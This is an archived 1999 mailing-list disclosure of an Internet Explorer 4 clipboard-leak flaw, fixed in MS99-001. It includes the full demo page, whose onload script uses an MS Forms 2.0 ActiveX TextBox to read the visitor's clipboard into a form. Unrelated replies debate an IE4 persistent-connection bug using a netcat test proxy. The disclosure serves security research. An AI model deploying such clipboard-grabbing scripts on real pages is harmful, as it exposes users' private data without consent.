MSIE 4 Privacy Issue: clipboard content can be made public by a javascript code two lines long. Exploit code included.
533480375e13300a1ea411f4dea31920cc0d84718326039eb9f44a2afd0493a2Date: Thu, 21 Jan 1999 15:59:15 +0100
From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: New IE4 privacy issue
Greetings,
There is a new IE 4 issue affecting privacy. The clipboard content can be made public by a javascript code two lines long.
I reported the problem to Microsoft on Jan 7 and they have posted the corresponding security bulletin and a fix today 21 January.
Although the vulnerability can be exploited from IE 4 navigator it is not a IE 4 bug. The problem is located in some ActiveX called "MS Forms 2.0"
that are shipped and installed with the following applications :
Microsoft Office 97
Microsot Outlook 98
Microsoft Project 98
Microsoft Visual Basic 5.0
Other non MS applications based on VB or VBA
More info and a demo is available at :
http://pages.whowhere.com/computers/cuartangojc
Microsoft security bulletin is :
http://www.microsoft.com/security/bulletins/ms99-001.asp
Regards,
Juan Carlos
----------[ http://pages.whowhere.com/computers/cuartangojc/ ]----------
The Clipboard vulnerability
Internet Explorer 4
Only if you also have installed one of the folowing applications :
Microsoft Office 97
Microsot Outlook 98 Microsoft Project 98</small><br>
Microsoft Visual Basic 5.0 </small></font></td>
Reported to MS Jan 7 1999
Confirmed and fixed Jan 21 1999.
http://www.microsoft.com/security/bulletins/ms99-001.asp
MS Security Bulletin ms99-001
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords"
content="explorer vulnerability,USP ,Cuartango,cuartango vulnerability, clipboard hole,clipboard ,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>The Clipboard vulnerability demo</title>
</head>
<body onload="GetClipBoard()">
<script>
function GetClipBoard()
{
tb.paste(); // paste over the Microsoft Forms 2.0 TextBox
document.forms(0).S1.value=tb.text; // moves the text to the text area box
if(document.forms(0).S1.value == "")
alert("Your browser does not have the security hole or your clipboard was empty ");
else
alert("Clipboard security hole in browser -- " + navigator.userAgent );
}
</script>
<h1 align="center"><font color="#FF0000"><small>T<strong>he Clipboard Vulnerability Demo</strong></small></font></h1>
<p align="left"><font face="Arial"><small>According with Microsoft security rules access
to Windows clipboard content is forbidden to Internet Explorer scripts unless the
clipboard content was owned by the Explorer itself. If an script performs a
"paste" operation over an input text box the operation will succeed only if data
were copied to the clipboard from the Internet Explorer. </small></font></p>
<p align="left"><small><font face="Arial">There is a way to circumvent this protection by
using a Microsoft Forms 2.0 TextBox ActiveX object. This TextBox object can perform a
"paste" operation without security restrictions. The clipboard data can then be
transferred to a form input box and posted to a malicious WEB. The vulnerabilty can also
be exploited from an e-mail message .</font></small></p>
<p align="left"><small><font face="Arial">This control does not ship with Windows or with
Internet Explorer, but rather people get it by installing Office 97, Visual Basic 5.0, or
a couple of other applications, although the exposure for most users would be through
Internet Explorer.</font></small></p>
<p align="left"><strong><small><font face="Arial">The box below is a Input Text Area
Box your clipboard text data must be here, if not then do a copy (from any application)
and reload this page. If this box shows your clipboard content then you are
affected.</font></small></strong></p>
<form method="POST" action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"
S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><div
align="center"><center><p><textarea rows="3" name="S1" cols="82"></textarea></p>
</center></div>
</form>
<p align="center"><small><font face="Arial"><strong>The box below (blue) is a Microsoft
Forms 2.0 TextBox ActiveX object, it will also show the clipboard content.</strong></font></small><br>
<br>
<object id="tb" classid="clsid:8BD21D10-EC42-11CE-9E0D-00AA006002F3" width="169"
height="23">
<param name="VariousPropertyBits" value="2894088219">
<param name="BackColor" value="16776960">
<param name="Size" value="4480;600">
<param name="FontHeight" value="200">
<param name="FontCharSet" value="0">
<param name="FontPitchAndFamily" value="2">
</object>
</p>
<div align="center"><center>
<table border="0">
<tr>
<td style="border: 1px solid"><p align="left"><font face="Arial"><strong><small>The script
making public the clipboard is very simple :</small></strong><br>
</font><font COLOR="#000000" face="Courier New" size="2"><br>
function GetClipBoard()<br>
{<br>
tb.paste();
// paste over the MS Forms 2.0 TextBox <br>
document.forms(0).S1.value=tb.text; // moves the text to the text area box<br>
}</font></td>
</tr>
</table>
</center></div>
<p align="center"><a href="index.html"><font size="4"><strong>Back to Main Page (More
BUGS)</strong></font></a></p>
<p align="center"><font color="#FF0000">Created by</font> <a
href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos Garcia Cuartango</a> </p>
</body>
</html>
-----------------------------------------------------------------------------------
Date: Mon, 25 Jan 1999 06:45:37 +0100
From: Drazen Kacar <dave@SRCE.HR>
To: BUGTRAQ@netspace.org
Subject: Re: IE4 Persistent Connection Bug
Joel Moses wrote:
> The document below details a connection-reuse problem which uses
> persistent connections even when they have either 1) been specifically
> disabled, or 2) have been told to close by a server "Connection:
> close".
[...]
> ------------------------------------------------------------------
> $ nc -p 9000 -l
> GET http://www.somesite.com/ HTTP/1.0
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-excel, application/msword,
> application/vnd.ms-powerpoint, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)
> Host: www.somesite.com
> Proxy-Connection: Keep-Alive
>
> "HTTP/1.1 200 OK"
> "Connection: close"
> "Content-Length: 5"
>
> "abcde"
> ------------------------------------------------------------------
>
> The browser will display "abcde," and the IE logo will stop
> circulating. However, the connection will not -- as requested by the
> server -- close. If you issue another page request in the browser for
You mean "as requested by the origin server." Connection header is hop-by-hop,
which means that it has a meaning for a connection between origin server
and proxy server only. Proxy server doesn't have to propagate it to the
user agent. And there is a Proxy-Connection header in the request.
I don't know where that one is defined (it isn't in RFC 1945, nor in RFC 2068,
nor in the latest HTTP/1.1 draft), but I would assume it has to do
something with open connections between user agent and proxy server.
> a different site, the request will come through on this
> previously-opened connection, e.g.,:
>
> ------------------------------------------------------------------
> GET http://www.othersite.com/ HTTP/1.0
> Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-excel, application/msword,
> application/vnd.ms-powerpoint, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 4.01, Windows 95)
> Host: www.othersite.com
> Proxy-Connection: Keep-Alive
> ------------------------------------------------------------------
>
> This clearly violates HTTP/1.0 behavior, with which the browser
> reports to the server that it complies.
It doesn't. Your netcat "proxy" violates it. Here's a quote from RFC 1945:
Except for experimental applications, current practice requires that
the connection be established by the client prior to each request and
closed by the server after sending the response.
> Netscape 4.x behaves correctly and closes the connection itself when
> faced with the same situation.
See above. The server is responsible for closing the connection. Server
here means either origin server or proxy server, whichever happens to be
connected to user agent.
--
.-. .-. Life is a sexually transmitted disease.
(_ \ / _)
| dave@srce.hr
| dave@fly.cc.fer.hr
-----------------------------------------------------------------------------------
Date: Mon, 25 Jan 1999 15:14:15 -0000
From: Eamonn Turley <ETurley@ALBAN.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: New IE4 privacy issue
Not just Javascript code.
VB Script, as well.
Anything that can use ActiveX controls, can do it.
This is all of office, Internet Explorer, Visual Studion (VB, C++ etc),
Netscape Navigator (I believe) and I believe AutoCAD uses VB-Script, so
may be able to do this.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed